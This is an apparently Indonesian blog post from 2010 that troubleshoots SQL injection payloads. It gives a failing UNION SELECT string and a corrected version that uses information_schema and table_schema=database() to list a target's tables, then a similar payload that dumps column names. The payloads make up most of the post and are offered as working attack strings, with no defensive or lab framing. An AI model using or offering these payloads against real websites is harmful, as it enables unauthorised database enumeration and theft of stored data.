Rabu, Oktober 20, 2010

Problem Penulisan di SQL Injection

Penulis Day Milovich | Rabu, Oktober 20, 2010 | 12.18.00 |

Problem:
Syntax ini tidak dapat dijalankan ketika di-inject-kan

union select 1,2,group_concat(table_name),4,5 from information_schema.tables--


Fix [Perbaikan]:
union select 1,2,group_concat(table_name),4,5 +from+information_schema.tables+where+ table_schema=database()--


"table_schema" is the database so when you type table_schema=database() it returns true and dumps all user created tables, the same for columns:

union select 1,2,group_concat(column_name),4,5 +from+information_schema.columns+where table_schema=database()--


Day Milovich,,
http://facebook.com/daymilovich
http://daymilovich.blogspot.com

Tidak ada komentar:

Posting Komentar

Anda bisa berkomentar tanpa perlu login.

 
Day Milovich (c) 2013. Diberdayakan oleh Blogger.